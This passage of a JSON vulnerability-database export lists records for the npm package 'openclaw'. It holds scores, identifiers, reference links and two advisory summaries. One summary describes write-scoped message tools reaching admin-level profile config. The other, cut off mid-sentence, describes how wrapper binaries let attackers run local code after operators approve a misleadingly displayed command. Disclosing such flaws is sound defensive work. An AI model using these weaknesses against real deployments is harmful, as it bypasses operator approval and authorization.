ring_elements":""}],"url":"https://github.com/advisories/GHSA-h3rm-6x7g-882f"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-h3rm-6x7g-882f","reference_id":"GHSA-h3rm-6x7g-882f","reference_type":"","scores":[{"value":"6.7","scoring_syste
m":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-19T16:09:30Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-h3rm-6x7g-882f"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74401?format=json","purl":"pkg:npm/openclaw@2026.3.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-2927-2whr-sudd"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerabilit
y":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-74bc-hfqh-cbcd"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8v2w-jgh7-6ybq"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerabilit
y":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerabilit
y":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-edn6-zer1-cya4"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j6nj-gf5b-1khk"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jad8-5duz-dqg1"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerabilit
y":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kp3a-gr66-zkam"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-m46m-y19r-2kd2"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-qyyn-bw9t-r7c4"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerabilit
y":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-tu4b-f885-eyds"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerabilit
y":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.2"}],"aliases":["CVE-2026-29608","GHSA-h3rm-6x7g-882f"],"risk_score":3.1,"exploitability":"
0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-qahm-7zt5-fqcg"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90075?format=json","vulnerability_id":"VCID-qedr-a3ay-v3gx","summary":"OpenClaw: Matrix profile config persistence was reachable from operator.write message tools\n## Summary\n\nMatrix profile config persistence was reachable from operator.write message tools.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.10`\n- Patched versions: `>= 2026.4.10`\n\n## Impact\n\nGateway `operator.write` message-tool paths could reach Matrix profile persistence that should have required admin-level authority.\n\n## Technical Details\n\nThe fix gates Matrix profile updates for non-owner message-tool runs and prevents write-scoped callers from mutating persistent profile config.\n\n## Fix\n\nThe issue was fixed in #62662. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `fe0f686c9228fffcec6de4011da45e69a6e23e54`\n- PR: #62662\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.10 or newer. 
The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zpbrent and @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42433","reference_id":"","reference_type":"","scores":[{"value":"0.00028","scoring_system":"epss","scoring_elements":"0.08411","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00032","scoring_system":"epss","scoring_elements":"0.09776","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00032","scoring_system":"epss","scoring_elements":"0.09802","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42433"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/fe0f686c9228fffcec6de4011da45e69a6e23e54","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T13:48:50Z/"}],"url":"https://github.com/openclaw/openclaw/commit/fe0f686c9228fffcec6de4011da45e69a6e23e54"},{"reference_url":"https://github.com/openclaw/openclaw/pull/62662","reference_id":"","reference_type":"","scores":[{"value":"6.5","scori
ng_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/62662"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-7jp6-r74r-995q","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T13:48:50Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-7jp6-r74r-995q"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42433","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42433"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-unauthorized-matrix-profile-config-persistence-access-via-operator-write-message-tools","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"}
,{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T13:48:50Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-unauthorized-matrix-profile-config-persistence-access-via-operator-write-message-tools"},{"reference_url":"https://github.com/advisories/GHSA-7jp6-r74r-995q","reference_id":"GHSA-7jp6-r74r-995q","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-7jp6-r74r-995q"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109896?format=json","purl":"pkg:npm/openclaw@2026.4.10","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6cfj-zugb-7uhq"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hphn-8fnj-qkh2"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-q3a2-qk5j-1yat"},{"vulnerability
":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.10"}],"aliases":["CVE-2026-42433","GHSA-7jp6-r74r-995q"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-qedr-a3ay-v3gx"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90848?format=json","vulnerability_id":"VCID-qhr2-jktm-uycx","summary":"Duplicate Advisory: OpenClaw: Node-host approvals could show misleading shell payloads instead of the executed argv\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-rw39-5899-8mxp. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.11 contains an approval-integrity vulnerability in node-host system.run approvals that displays extracted shell payloads instead of the executed argv. 
Attackers can place wrapper binaries and induce wrapper-shaped commands to execute local code after operators approve misleading command 